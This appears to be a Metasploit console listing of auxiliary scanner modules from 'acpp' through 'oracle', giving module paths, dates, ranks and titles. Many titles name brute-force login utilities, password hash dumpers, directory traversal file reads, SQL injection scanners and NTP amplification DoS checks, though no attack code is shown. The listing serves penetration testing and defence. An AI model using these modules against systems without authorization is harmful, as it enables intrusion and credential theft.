   scanner/acpp/login                                                              normal  Apple Airport ACPP Authentication Scanner
   scanner/afp/afp_login                                                           normal  Apple Filing Protocol Login Utility
   scanner/afp/afp_server_info                                                     normal  Apple Filing Protocol Info Enumerator
   scanner/backdoor/energizer_duo_detect                                           normal  Energizer DUO Trojan Scanner
   scanner/chargen/chargen_probe                                  1996-02-08       normal  Chargen Probe Utility
   scanner/couchdb/couchdb_enum                                                    normal  CouchDB Enum Utility
   scanner/couchdb/couchdb_login                                                   normal  CouchDB Login Utility
   scanner/db2/db2_auth                                                            normal  DB2 Authentication Brute Force Utility
   scanner/db2/db2_version                                                         normal  DB2 Probe Utility
   scanner/db2/discovery                                                           normal  DB2 Discovery Service Detection
   scanner/dcerpc/endpoint_mapper                                                  normal  Endpoint Mapper Service Discovery
   scanner/dcerpc/hidden                                                           normal  Hidden DCERPC Service Discovery
   scanner/dcerpc/management                                                       normal  Remote Management Interface Discovery
   scanner/dcerpc/tcp_dcerpc_auditor                                               normal  DCERPC TCP Service Auditor
   scanner/dcerpc/windows_deployment_services                                      normal  Microsoft Windows Deployment Services Unattend Retrieval
   scanner/dect/call_scanner                                                       normal  DECT Call Scanner
   scanner/dect/station_scanner                                                    normal  DECT Base Station Scanner
   scanner/discovery/arp_sweep                                                     normal  ARP Sweep Local Network Discovery
   scanner/discovery/empty_udp                                                     normal  UDP Empty Prober
   scanner/discovery/ipv6_multicast_ping                                           normal  IPv6 Link Local/Node Local Ping Discovery
   scanner/discovery/ipv6_neighbor                                                 normal  IPv6 Local Neighbor Discovery
   scanner/discovery/ipv6_neighbor_router_advertisement                            normal  IPv6 Local Neighbor Discovery Using Router Advertisement
   scanner/discovery/udp_probe                                                     normal  UDP Service Prober
   scanner/discovery/udp_sweep                                                     normal  UDP Service Sweeper
   scanner/dlsw/dlsw_leak_capture                                 2014-11-17       normal  Cisco DLSw Information Disclosure Scanner
   scanner/dns/dns_amp                                                             normal  DNS Amplification Scanner
   scanner/elasticsearch/indices_enum                                              normal  ElasticSearch Indices Enumeration Utility
   scanner/emc/alphastor_devicemanager                                             normal  EMC AlphaStor Device Manager Service
   scanner/emc/alphastor_librarymanager                                            normal  EMC AlphaStor Library Manager Service
   scanner/finger/finger_users                                                     normal  Finger Service User Enumerator
   scanner/ftp/anonymous                                                           normal  Anonymous FTP Access Detection
   scanner/ftp/bison_ftp_traversal                                2015-09-28       normal  BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure
   scanner/ftp/colorado_ftp_traversal                             2016-08-11       normal  ColoradoFTP Server 1.3 Build 8 Directory Traversal Information Disclosure
   scanner/ftp/easy_file_sharing_ftp                              2017-03-07       normal  Easy File Sharing FTP Server 3.6 Directory Traversal
   scanner/ftp/ftp_login                                                           normal  FTP Authentication Scanner
   scanner/ftp/ftp_version                                                         normal  FTP Version Scanner
   scanner/ftp/konica_ftp_traversal                               2015-09-22       normal  Konica Minolta FTP Utility 1.00 Directory Traversal Information Disclosure
   scanner/ftp/pcman_ftp_traversal                                2015-09-28       normal  PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure
   scanner/ftp/titanftp_xcrc_traversal                            2010-06-15       normal  Titan FTP XCRC Directory Traversal Information Disclosure
   scanner/gopher/gopher_gophermap                                                 normal  Gopher gophermap Scanner
   scanner/h323/h323_version                                                       normal  H.323 Version Scanner
   scanner/http/a10networks_ax_directory_traversal                2014-01-28       normal  A10 Networks AX Loadbalancer Directory Traversal
   scanner/http/accellion_fta_statecode_file_read                 2015-07-10       normal  Accellion FTA 'statecode' Cookie Arbitrary File Read
   scanner/http/adobe_xml_inject                                                   normal  Adobe XML External Entity Injection
   scanner/http/advantech_webaccess_login                                          normal  Advantech WebAccess Login
   scanner/http/allegro_rompager_misfortune_cookie                2014-12-17       normal  Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Scanner
   scanner/http/apache_activemq_source_disclosure                                  normal  Apache ActiveMQ JSP Files Source Disclosure
   scanner/http/apache_activemq_traversal                                          normal  Apache ActiveMQ Directory Traversal
   scanner/http/apache_mod_cgi_bash_env                           2014-09-24       normal  Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   scanner/http/apache_optionsbleed                               2017-09-18       normal  Apache Optionsbleed Scanner
   scanner/http/apache_userdir_enum                                                normal  Apache "mod_userdir" User Enumeration
   scanner/http/appletv_login                                                      normal  AppleTV AirPlay Login Utility
   scanner/http/atlassian_crowd_fileaccess                                         normal  Atlassian Crowd XML Entity Expansion Remote File Access
   scanner/http/axis_local_file_include                                            normal  Apache Axis2 v1.4.1 Local File Inclusion
   scanner/http/axis_login                                                         normal  Apache Axis2 Brute Force Utility
   scanner/http/backup_file                                                        normal  HTTP Backup File Scanner
   scanner/http/barracuda_directory_traversal                     2010-10-08       normal  Barracuda Multiple Product "locale" Directory Traversal
   scanner/http/bavision_cam_login                                                 normal  BAVision IP Camera Web Server Login
   scanner/http/binom3_login_config_pass_dump                                      normal  Binom3 Web Management Login Scanner, Config and Password File Dump
   scanner/http/bitweaver_overlay_type_traversal                  2012-10-23       normal  Bitweaver overlay_type Directory Traversal
   scanner/http/blind_sql_query                                                    normal  HTTP Blind SQL Injection Scanner
   scanner/http/bmc_trackit_passwd_reset                          2014-12-09       normal  BMC TrackIt! Unauthenticated Arbitrary User Password Change
   scanner/http/brute_dirs                                                         normal  HTTP Directory Brute Force Scanner
   scanner/http/buffalo_login                                                      normal  Buffalo NAS Login Utility
   scanner/http/buildmaster_login                                                  normal  Inedo BuildMaster Login Scanner
   scanner/http/caidao_bruteforce_login                                            normal  Chinese Caidao Backdoor Bruteforce
   scanner/http/canon_wireless                                    2013-06-18       normal  Canon Printer Wireless Configuration Disclosure
   scanner/http/cert                                                               normal  HTTP SSL Certificate Checker
   scanner/http/chef_webui_login                                                   normal  Chef Web UI Brute Force Utility
   scanner/http/chromecast_webserver                                               normal  Chromecast Web Server Scanner
   scanner/http/chromecast_wifi                                                    normal  Chromecast Wifi Enumeration
   scanner/http/cisco_asa_asdm                                                     normal  Cisco ASA ASDM Bruteforce Login Utility
   scanner/http/cisco_device_manager                              2000-10-26       normal  Cisco Device HTTP Device Manager Access
   scanner/http/cisco_firepower_download                          2016-10-10       normal  Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal
   scanner/http/cisco_firepower_login                                              normal  Cisco Firepower Management Console 6.0 Login
   scanner/http/cisco_ios_auth_bypass                             2001-06-27       normal  Cisco IOS HTTP Unauthorized Administrative Access
   scanner/http/cisco_ironport_enum                                                normal  Cisco Ironport Bruteforce Login Utility
   scanner/http/cisco_nac_manager_traversal                                        normal  Cisco Network Access Manager Directory Traversal Vulnerability
   scanner/http/cisco_ssl_vpn                                                      normal  Cisco SSL VPN Bruteforce Login Utility
   scanner/http/cisco_ssl_vpn_priv_esc                            2014-04-09       normal  Cisco ASA SSL VPN Privilege Escalation Vulnerability
   scanner/http/clansphere_traversal                              2012-10-23       normal  ClanSphere 2011.3 Local File Inclusion Vulnerability
   scanner/http/coldfusion_locale_traversal                                        normal  ColdFusion Server Check
   scanner/http/coldfusion_version                                                 normal  ColdFusion Version Scanner
   scanner/http/concrete5_member_list                                              normal  Concrete5 Member List Enumeration
   scanner/http/copy_of_file                                                       normal  HTTP Copy File Scanner
   scanner/http/crawler                                                            normal  Web Site Crawler
   scanner/http/dell_idrac                                                         normal  Dell iDRAC Default Login
   scanner/http/dir_listing                                                        normal  HTTP Directory Listing Scanner
   scanner/http/dir_scanner                                                        normal  HTTP Directory Scanner
   scanner/http/dir_webdav_unicode_bypass                                          normal  MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
   scanner/http/dlink_dir_300_615_http_login                                       normal  D-Link DIR-300A / DIR-320 / DIR-615D HTTP Login Utility
   scanner/http/dlink_dir_615h_http_login                                          normal  D-Link DIR-615H HTTP Login Utility
   scanner/http/dlink_dir_session_cgi_http_login                                   normal  D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility
   scanner/http/dlink_user_agent_backdoor                         2013-10-12       normal  D-Link User-Agent Backdoor Scanner
   scanner/http/dnalims_file_retrieve                             2017-03-08       normal  DnaLIMS Directory Traversal
   scanner/http/dolibarr_login                                                     normal  Dolibarr ERP/CRM Login Utility
   scanner/http/drupal_views_user_enum                            2010-07-02       normal  Drupal Views Module Users Enumeration
   scanner/http/ektron_cms400net                                                   normal  Ektron CMS400.NET Default Password Scanner
   scanner/http/elasticsearch_traversal                                            normal  ElasticSearch Snapshot API Directory Traversal
   scanner/http/enum_wayback                                                       normal  Archive.org Stored Domain URLs
   scanner/http/epmp1000_cmd_exec                                                  normal  Cambium ePMP 1000 (up to v2.5) Arbitrary Command Execution
   scanner/http/epmp1000_dump_config                                               normal  Cambium ePMP 1000 Dump Device Config
   scanner/http/epmp1000_dump_hashes                                               normal  Cambium ePMP 1000 Password Hash Extractor
   scanner/http/epmp1000_web_login                                                 normal  Cambium ePMP 1000 Login Scanner
   scanner/http/error_sql_injection                                                normal  HTTP Error Based SQL Injection Scanner
   scanner/http/etherpad_duo_login                                                 normal  EtherPAD Duo Login Bruteforce Utility
   scanner/http/f5_bigip_virtual_server                                            normal  F5 BigIP HTTP Virtual Server Scanner
   scanner/http/f5_mgmt_scanner                                                    normal  F5 Networks Devices Management Interface Scanner
   scanner/http/file_same_name_dir                                                 normal  HTTP File Same Name Directory Scanner
   scanner/http/files_dir                                                          normal  HTTP Interesting File Scanner
   scanner/http/frontpage_login                                                    normal  FrontPage Server Extensions Anonymous Login Scanner
   scanner/http/gavazzi_em_login_loot                                              normal  Carlo Gavazzi Energy Meters - Login Brute Force, Extract Info and Dump Plant Database
   scanner/http/git_scanner                                                        normal  HTTP Git Scanner
   scanner/http/gitlab_login                                                       normal  GitLab Login Utility
   scanner/http/gitlab_user_enum                                  2014-11-21       normal  GitLab User Enumeration
   scanner/http/glassfish_login                                                    normal  GlassFish Brute Force Utility
   scanner/http/goahead_traversal                                                  normal  Embedthis GoAhead Embedded Web Server Directory Traversal
   scanner/http/groupwise_agents_http_traversal                                    normal  Novell Groupwise Agents HTTP Directory Traversal
   scanner/http/host_header_injection                                              normal  HTTP Host Header Injection Detection
   scanner/http/hp_imc_bims_downloadservlet_traversal                              normal  HP Intelligent Management BIMS DownloadServlet Directory Traversal
   scanner/http/hp_imc_faultdownloadservlet_traversal                              normal  HP Intelligent Management FaultDownloadServlet Directory Traversal
   scanner/http/hp_imc_ictdownloadservlet_traversal                                normal  HP Intelligent Management IctDownloadServlet Directory Traversal
   scanner/http/hp_imc_reportimgservlt_traversal                                   normal  HP Intelligent Management ReportImgServlt Directory Traversal
   scanner/http/hp_imc_som_file_download                                           normal  HP Intelligent Management SOM FileDownloadServlet Arbitrary Download
   scanner/http/hp_sitescope_getfileinternal_fileaccess                            normal  HP SiteScope SOAP Call getFileInternal Remote File Access
   scanner/http/hp_sitescope_getsitescopeconfiguration                             normal  HP SiteScope SOAP Call getSiteScopeConfiguration Configuration Access
   scanner/http/hp_sitescope_loadfilecontent_fileaccess                            normal  HP SiteScope SOAP Call loadFileContent Remote File Access
   scanner/http/hp_sys_mgmt_login                                                  normal  HP System Management Homepage Login Utility
   scanner/http/http_header                                                        normal  HTTP Header Detection
   scanner/http/http_hsts                                                          normal  HTTP Strict Transport Security (HSTS) Detection
   scanner/http/http_login                                                         normal  HTTP Login Utility
   scanner/http/http_put                                                           normal  HTTP Writable Path PUT/DELETE File Access
   scanner/http/http_traversal                                                     normal  Generic HTTP Directory Traversal Utility
   scanner/http/http_version                                                       normal  HTTP Version Detection
   scanner/http/httpbl_lookup                                                      normal  Http:BL Lookup
   scanner/http/iis_internal_ip                                                    normal  Microsoft IIS HTTP Internal IP Disclosure
   scanner/http/influxdb_enum                                                      normal  InfluxDB Enum Utility
   scanner/http/infovista_enum                                                     normal  InfoVista VistaPortal Application Bruteforce Login Utility
   scanner/http/intel_amt_digest_bypass                           2017-05-05       normal  Intel AMT Digest Authentication Bypass Scanner
   scanner/http/ipboard_login                                                      normal  IP Board Login Auxiliary Module
   scanner/http/jboss_status                                                       normal  JBoss Status Servlet Information Gathering
   scanner/http/jboss_vulnscan                                                     normal  JBoss Vulnerability Scanner
   scanner/http/jenkins_command                                                    normal  Jenkins-CI Unauthenticated Script-Console Scanner
   scanner/http/jenkins_enum                                                       normal  Jenkins-CI Enumeration
   scanner/http/jenkins_login                                                      normal  Jenkins-CI Login Utility
   scanner/http/joomla_bruteforce_login                                            normal  Joomla Bruteforce Login Utility
   scanner/http/joomla_ecommercewd_sqli_scanner                   2015-03-20       normal  Web-Dorado ECommerce WD for Joomla! search_category_id SQL Injection Scanner
   scanner/http/joomla_gallerywd_sqli_scanner                     2015-03-30       normal  Gallery WD for Joomla! Unauthenticated SQL Injection Scanner
   scanner/http/joomla_pages                                                       normal  Joomla Page Scanner
   scanner/http/joomla_plugins                                                     normal  Joomla Plugins Scanner
   scanner/http/joomla_version                                                     normal  Joomla Version Scanner
   scanner/http/kodi_traversal                                    2017-02-12       normal  Kodi 17.0 Local File Inclusion Vulnerability
   scanner/http/linknat_vos_traversal                                              normal  Linknat Vos Manager Traversal
   scanner/http/linksys_e1500_traversal                                            normal  Linksys E1500 Directory Traversal Vulnerability
   scanner/http/litespeed_source_disclosure                                        normal  LiteSpeed Source Code Disclosure/Download
   scanner/http/lucky_punch                                                        normal  HTTP Microsoft SQL Injection Table XSS Infection
   scanner/http/majordomo2_directory_traversal                    2011-03-08       normal  Majordomo2 _list_file_get() Directory Traversal
   scanner/http/manageengine_desktop_central_login                                 normal  ManageEngine Desktop Central Login Utility
   scanner/http/manageengine_deviceexpert_traversal               2012-03-18       normal  ManageEngine DeviceExpert 5.6 ScheduleResultViewer FileName Traversal
   scanner/http/manageengine_deviceexpert_user_creds              2014-08-28       normal  ManageEngine DeviceExpert User Credentials
   scanner/http/manageengine_securitymanager_traversal            2012-10-19       normal  ManageEngine SecurityManager Plus 5.5 Directory Traversal
   scanner/http/mediawiki_svg_fileaccess                                           normal  MediaWiki SVG XML Entity Expansion Remote File Access
   scanner/http/meteocontrol_weblog_extractadmin                                   normal  Meteocontrol WEBlog Password Extractor
   scanner/http/mod_negotiation_brute                                              normal  Apache HTTPD mod_negotiation Filename Bruter
   scanner/http/mod_negotiation_scanner                                            normal  Apache HTTPD mod_negotiation Scanner
   scanner/http/ms09_020_webdav_unicode_bypass                                     normal  MS09-020 IIS6 WebDAV Unicode Authentication Bypass
   scanner/http/ms15_034_http_sys_memory_dump                                      normal  MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
   scanner/http/mybook_live_login                                                  normal  Western Digital MyBook Live Login Utility
   scanner/http/netdecision_traversal                             2012-03-07       normal  NetDecision NOCVision Server Directory Traversal
   scanner/http/netgear_sph200d_traversal                                          normal  Netgear SPH200D Directory Traversal Vulnerability
   scanner/http/nginx_source_disclosure                                            normal  Nginx Source Code Disclosure/Download
   scanner/http/novell_file_reporter_fsfui_fileaccess             2012-11-16       normal  NFR Agent FSFUI Record Arbitrary Remote File Access
   scanner/http/novell_file_reporter_srs_fileaccess               2012-11-16       normal  NFR Agent SRS Record Arbitrary Remote File Access
   scanner/http/novell_mdm_creds                                                   normal  Novell Zenworks Mobile Device Managment Admin Credentials
   scanner/http/ntlm_info_enumeration                                              normal  Host Information Enumeration via NTLM Authentication
   scanner/http/octopusdeploy_login                                                normal  Octopus Deploy Login Utility
   scanner/http/open_proxy                                                         normal  HTTP Open Proxy Detection
   scanner/http/openmind_messageos_login                                           normal  OpenMind Message-OS Portal Login Brute Force Utility
   scanner/http/options                                                            normal  HTTP Options Detection
   scanner/http/oracle_demantra_database_credentials_leak         2014-02-28       normal  Oracle Demantra Database Credentials Leak
   scanner/http/oracle_demantra_file_retrieval                    2014-02-28       normal  Oracle Demantra Arbitrary File Retrieval with Authentication Bypass
   scanner/http/oracle_ilom_login                                                  normal  Oracle ILO Manager Login Brute Force Utility
   scanner/http/owa_ews_login                                                      normal  OWA Exchange Web Services (EWS) Login Scanner
   scanner/http/owa_iis_internal_ip                               2012-12-17       normal  Outlook Web App (OWA) / Client Access Server (CAS) IIS HTTP Internal IP Disclosure
   scanner/http/owa_login                                                          normal  Outlook Web App (OWA) Brute Force Utility
   scanner/http/pocketpad_login                                                    normal  PocketPAD Login Bruteforce Force Utility
   scanner/http/prev_dir_same_name_file                                            normal  HTTP Previous Directory File Scanner
   scanner/http/radware_appdirector_enum                                           normal  Radware AppDirector Bruteforce Login Utility
   scanner/http/rails_json_yaml_scanner                                            normal  Ruby on Rails JSON Processor YAML Deserialization Scanner
   scanner/http/rails_mass_assignment                                              normal  Ruby On Rails Attributes Mass Assignment Scanner
   scanner/http/rails_xml_yaml_scanner                                             normal  Ruby on Rails XML Processor YAML Deserialization Scanner
   scanner/http/replace_ext                                                        normal  HTTP File Extension Scanner
   scanner/http/rewrite_proxy_bypass                                               normal  Apache Reverse Proxy Bypass Vulnerability Scanner
   scanner/http/rfcode_reader_enum                                                 normal  RFCode Reader Web Interface Login / Bruteforce Utility
   scanner/http/rips_traversal                                                     normal  RIPS Scanner Directory Traversal
   scanner/http/riverbed_steelhead_vcx_file_read                  2017-06-01       normal  Riverbed SteelHead VCX File Read
   scanner/http/robots_txt                                                         normal  HTTP Robots.txt Content Scanner
   scanner/http/s40_traversal                                     2011-04-07       normal  S40 0.4.2 CMS Directory Traversal Vulnerability
   scanner/http/sap_businessobjects_user_brute                                     normal  SAP BusinessObjects User Bruteforcer
   scanner/http/sap_businessobjects_user_brute_web                                 normal  SAP BusinessObjects Web User Bruteforcer
   scanner/http/sap_businessobjects_user_enum                                      normal  SAP BusinessObjects User Enumeration
   scanner/http/sap_businessobjects_version_enum                                   normal  SAP BusinessObjects Version Detection
   scanner/http/scraper                                                            normal  HTTP Page Scraper
   scanner/http/sentry_cdu_enum                                                    normal  Sentry Switched CDU Bruteforce Login Utility
   scanner/http/servicedesk_plus_traversal                        2015-10-03       normal  ManageEngine ServiceDesk Plus Path Traversal
   scanner/http/sevone_enum                                       2013-06-07       normal  SevOne Network Performance Management Application Brute Force Login Utility
   scanner/http/simple_webserver_traversal                        2013-01-03       normal  Simple Web Server 2.3-RC1 Directory Traversal
   scanner/http/smt_ipmi_49152_exposure                           2014-06-19       normal  Supermicro Onboard IPMI Port 49152 Sensitive File Exposure
   scanner/http/smt_ipmi_cgi_scanner                              2013-11-06       normal  Supermicro Onboard IPMI CGI Vulnerability Scanner
   scanner/http/smt_ipmi_static_cert_scanner                      2013-11-06       normal  Supermicro Onboard IPMI Static SSL Certificate Scanner
   scanner/http/smt_ipmi_url_redirect_traversal                   2013-11-06       normal  Supermicro Onboard IPMI url_redirect.cgi Authenticated Directory Traversal
   scanner/http/soap_xml                                                           normal  HTTP SOAP Verb/Noun Brute Force Scanner
   scanner/http/sockso_traversal                                  2012-03-14       normal  Sockso Music Host Server 1.5 Directory Traversal
   scanner/http/splunk_web_login                                                   normal  Splunk Web Interface Login Utility
   scanner/http/squid_pivot_scanning                                               normal  Squid Proxy Port Scanner
   scanner/http/squiz_matrix_user_enum                            2011-11-08       normal  Squiz Matrix User Enumeration Scanner
   scanner/http/ssl                                                                normal  HTTP SSL Certificate Information
   scanner/http/ssl_version                                       2014-10-14       normal  HTTP SSL/TLS Version Detection (POODLE scanner)
   scanner/http/support_center_plus_directory_traversal           2014-01-28       normal  ManageEngine Support Center Plus Directory Traversal
   scanner/http/surgenews_user_creds                              2017-06-16       normal  SurgeNews User Credentials
   scanner/http/svn_scanner                                                        normal  HTTP Subversion Scanner
   scanner/http/svn_wcdb_scanner                                                   normal  SVN wc.db Scanner
   scanner/http/sybase_easerver_traversal                         2011-05-25       normal  Sybase Easerver 6.3 Directory Traversal
   scanner/http/symantec_brightmail_ldapcreds                     2015-12-17       normal  Symantec Messaging Gateway 10 Exposure of Stored AD Password Vulnerability
   scanner/http/symantec_brightmail_logfile                       2012-11-30       normal  Symantec Messaging Gateway 9.5 Log File Download Vulnerability
   scanner/http/symantec_web_gateway_login                                         normal  Symantec Web Gateway Login Utility
   scanner/http/titan_ftp_admin_pwd                                                normal  Titan FTP Administrative Password Disclosure
   scanner/http/title                                                              normal  HTTP HTML Title Tag Content Grabber
   scanner/http/tomcat_enum                                                        normal  Apache Tomcat User Enumeration
   scanner/http/tomcat_mgr_login                                                   normal  Tomcat Application Manager Login Utility
   scanner/http/tplink_traversal_noauth                                            normal  TP-Link Wireless Lite N Access Point Directory Traversal Vulnerability
   scanner/http/trace                                                              normal  HTTP Cross-Site Tracing Detection
   scanner/http/trace_axd                                                          normal  HTTP trace.axd Content Scanner
   scanner/http/typo3_bruteforce                                                   normal  Typo3 Login Bruteforcer
   scanner/http/vcms_login                                                         normal  V-CMS Login Utility
   scanner/http/verb_auth_bypass                                                   normal  HTTP Verb Authentication Bypass Scanner
   scanner/http/vhost_scanner                                                      normal  HTTP Virtual Host Brute Force Scanner
   scanner/http/wangkongbao_traversal                                              normal  WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal
   scanner/http/web_vulndb                                                         normal  HTTP Vuln Scanner
   scanner/http/webdav_internal_ip                                                 normal  HTTP WebDAV Internal IP Scanner
   scanner/http/webdav_scanner                                                     normal  HTTP WebDAV Scanner
   scanner/http/webdav_website_content                                             normal  HTTP WebDAV Website Content Scanner
   scanner/http/webpagetest_traversal                             2012-07-13       normal  WebPageTest Directory Traversal
   scanner/http/wildfly_traversal                                 2014-10-22       normal  WildFly Directory Traversal
   scanner/http/wordpress_content_injection                       2017-02-01       normal  WordPress REST API Content Injection
   scanner/http/wordpress_cp_calendar_sqli                        2015-03-03       normal  WordPress CP Multi-View Calendar Unauthenticated SQL Injection Scanner
   scanner/http/wordpress_ghost_scanner                                            normal  WordPress XMLRPC GHOST Vulnerability Scanner
   scanner/http/wordpress_login_enum                                               normal  WordPress Brute Force and User Enumeration Utility
   scanner/http/wordpress_multicall_creds                                          normal  Wordpress XML-RPC system.multicall Credential Collector
   scanner/http/wordpress_pingback_access                                          normal  Wordpress Pingback Locator
   scanner/http/wordpress_scanner                                                  normal  Wordpress Scanner
   scanner/http/wordpress_xmlrpc_login                                             normal  Wordpress XML-RPC Username/Password Login Scanner
   scanner/http/wp_contus_video_gallery_sqli                      2015-02-24       normal  WordPress Contus Video Gallery Unauthenticated SQL Injection Scanner
   scanner/http/wp_dukapress_file_read                                             normal  WordPress DukaPress Plugin File Read Vulnerability
   scanner/http/wp_gimedia_library_file_read                                       normal  WordPress GI-Media Library Plugin Directory Traversal Vulnerability
   scanner/http/wp_mobile_pack_info_disclosure                                     normal  WordPress Mobile Pack Information Disclosure Vulnerability
   scanner/http/wp_mobileedition_file_read                                         normal  WordPress Mobile Edition File Read Vulnerability
   scanner/http/wp_nextgen_galley_file_read                                        normal  WordPress NextGEN Gallery Directory Read Vulnerability
   scanner/http/wp_simple_backup_file_read                                         normal  WordPress Simple Backup File Read Vulnerability
   scanner/http/wp_subscribe_comments_file_read                                    normal  WordPress Subscribe Comments File Read Vulnerability
   scanner/http/xpath                                                              normal  HTTP Blind XPATH 1.0 Injector
   scanner/http/yaws_traversal                                    2011-11-25       normal  Yaws Web Server Directory Traversal
   scanner/http/zabbix_login                                                       normal  Zabbix Server Brute Force Utility
   scanner/http/zenworks_assetmanagement_fileaccess                                normal  Novell ZENworks Asset Management 7.5 Remote File Access
   scanner/http/zenworks_assetmanagement_getconfig                                 normal  Novell ZENworks Asset Management 7.5 Configuration Access
   scanner/ike/cisco_ike_benigncertain                            2016-09-29       normal  Cisco IKE Information Disclosure
   scanner/imap/imap_version                                                       normal  IMAP4 Banner Grabber
   scanner/ip/ipidseq                                                              normal  IPID Sequence Scanner
   scanner/ipmi/ipmi_cipher_zero                                  2013-06-20       normal  IPMI 2.0 Cipher Zero Authentication Bypass Scanner
   scanner/ipmi/ipmi_dumphashes                                   2013-06-20       normal  IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval
   scanner/ipmi/ipmi_version                                                       normal  IPMI Information Discovery
   scanner/jenkins/jenkins_udp_broadcast_enum                                      normal  Jenkins Server Broadcast Enumeration
   scanner/kademlia/server_info                                                    normal  Gather Kademlia Server Information
   scanner/llmnr/query                                                             normal  LLMNR Query
   scanner/lotus/lotus_domino_hashes                                               normal  Lotus Domino Password Hash Collector
   scanner/lotus/lotus_domino_login                                                normal  Lotus Domino Brute Force Utility
   scanner/lotus/lotus_domino_version                                              normal  Lotus Domino Version
   scanner/mdns/query                                                              normal  mDNS Query
   scanner/misc/cctv_dvr_login                                                     normal  CCTV DVR Login Scanning Utility
   scanner/misc/cisco_smart_install                                                normal  Identify Cisco Smart Install endpoints
   scanner/misc/clamav_control                                    2016-06-08       normal  ClamAV Remote Command Transmitter
   scanner/misc/dahua_dvr_auth_bypass                                              normal  Dahua DVR Auth Bypass Scanner
   scanner/misc/dvr_config_disclosure                                              normal  Multiple DVR Manufacturers Configuration Disclosure
   scanner/misc/easycafe_server_fileaccess                                         normal  EasyCafe Server Remote File Access
   scanner/misc/ib_service_mgr_info                                                normal  Borland InterBase Services Manager Information
   scanner/misc/java_rmi_server                                   2011-10-15       normal  Java RMI Server Insecure Endpoint Code Execution Scanner
   scanner/misc/oki_scanner                                                        normal  OKI Printer Default Login Credential Scanner
   scanner/misc/poisonivy_control_scanner                                          normal  Poison Ivy Command and Control Scanner
   scanner/misc/raysharp_dvr_passwords                                             normal  Ray Sharp DVR Password Retriever
   scanner/misc/rosewill_rxs3211_passwords                                         normal  Rosewill RXS-3211 IP Camera Password Retriever
   scanner/misc/sercomm_backdoor_scanner                          2013-12-31       normal  SerComm Network Device Backdoor Detection
   scanner/misc/sunrpc_portmapper                                                  normal  SunRPC Portmap Program Enumerator
   scanner/misc/zenworks_preboot_fileaccess                                        normal  Novell ZENworks Configuration Management Preboot Service Remote File Access
   scanner/mongodb/mongodb_login                                                   normal  MongoDB Login Utility
   scanner/motorola/timbuktu_udp                                  2009-09-25       normal  Motorola Timbuktu Service Detection
   scanner/msf/msf_rpc_login                                                       normal  Metasploit RPC Interface Login Utility
   scanner/msf/msf_web_login                                                       normal  Metasploit Web Interface Login Utility
   scanner/mssql/mssql_hashdump                                                    normal  MSSQL Password Hashdump
   scanner/mssql/mssql_login                                                       normal  MSSQL Login Utility
   scanner/mssql/mssql_ping                                                        normal  MSSQL Ping Utility
   scanner/mssql/mssql_schemadump                                                  normal  MSSQL Schema Dump
   scanner/mysql/mysql_authbypass_hashdump                        2012-06-09       normal  MySQL Authentication Bypass Password Dump
   scanner/mysql/mysql_file_enum                                                   normal  MYSQL File/Directory Enumerator
   scanner/mysql/mysql_hashdump                                                    normal  MYSQL Password Hashdump
   scanner/mysql/mysql_login                                                       normal  MySQL Login Utility
   scanner/mysql/mysql_schemadump                                                  normal  MYSQL Schema Dump
   scanner/mysql/mysql_version                                                     normal  MySQL Server Version Enumeration
   scanner/mysql/mysql_writable_dirs                                               normal  MYSQL Directory Write Test
   scanner/natpmp/natpmp_portscan                                                  normal  NAT-PMP External Port Scanner
   scanner/nessus/nessus_ntp_login                                                 normal  Nessus NTP Login Utility
   scanner/nessus/nessus_rest_login                                                normal  Nessus RPC Interface Login Utility
   scanner/nessus/nessus_xmlrpc_login                                              normal  Nessus XMLRPC Interface Login Utility
   scanner/nessus/nessus_xmlrpc_ping                                               normal  Nessus XMLRPC Interface Ping Utility
   scanner/netbios/nbname                                                          normal  NetBIOS Information Discovery
   scanner/nexpose/nexpose_api_login                                               normal  NeXpose API Interface Login Utility
   scanner/nfs/nfsmount                                                            normal  NFS Mount Scanner
   scanner/nntp/nntp_login                                                         normal  NNTP Login Utility
   scanner/ntp/ntp_monlist                                                         normal  NTP Monitor List Scanner
   scanner/ntp/ntp_nak_to_the_future                                               normal  NTP "NAK to the Future"
   scanner/ntp/ntp_peer_list_dos                                  2014-08-25       normal  NTP Mode 7 PEER_LIST DoS Scanner
   scanner/ntp/ntp_peer_list_sum_dos                              2014-08-25       normal  NTP Mode 7 PEER_LIST_SUM DoS Scanner
   scanner/ntp/ntp_readvar                                                         normal  NTP Clock Variables Disclosure
   scanner/ntp/ntp_req_nonce_dos                                  2014-08-25       normal  NTP Mode 6 REQ_NONCE DRDoS Scanner
   scanner/ntp/ntp_reslist_dos                                    2014-08-25       normal  NTP Mode 7 GET_RESTRICT DRDoS Scanner
   scanner/ntp/ntp_unsettrap_dos                                  2014-08-25       normal  NTP Mode 6 UNSETTRAP DRDoS Scanner
   scanner/openvas/openvas_gsad_login                                              normal  OpenVAS gsad Web Interface Login Utility
   scanner/openvas/openvas_omp_login                                               normal  OpenVAS OMP Login Utility
   scanner/openvas/openvas_otp_login                                               normal  OpenVAS OTP Login Utility
   scanner/oracle/emc_sid                                                          normal  Oracle Enterprise Manager Control SID Discovery
   scanner/oracle/isqlplus_login                                                   normal  Oracle iSQL*Plus Login Utility
   scanner/oracle/isqlplus_sidbrute                                                normal  Oracle iSQLPlus SID Check
   scanner/oracle/oracle_hashdump                                                  normal  Oracle Password Hashdump
   scanner/oracle/oracle_login                                                     normal  Oracle RDBMS Login Utility
   scanner/oracle/sid_brute                                                        normal  Oracle TNS Listener SID Bruteforce
   scanner/oracle/sid_enum                                        2009-01-07       normal  Oracle TNS Listener SID Enumeration
   scanner/oracle/spy_sid                                                          normal  Oracle Application Server Spy Servlet SID Enumeration
   scanner/oracle/tnslsnr_version                                 2009-01-07       normal  Oracle TNS Listener Service Version Query
   scanner/oracle/tnspoison_checker                               2012-04-18       normal  Oracle TNS Listener Checker
   scanner/oracle/xdb_sid                                                          normal  Oracle XML DB SID Discovery
   scanner/oracle/xdb_sid_brute                                                    normal  Oracle XML DB SID Discovery via Brute Force
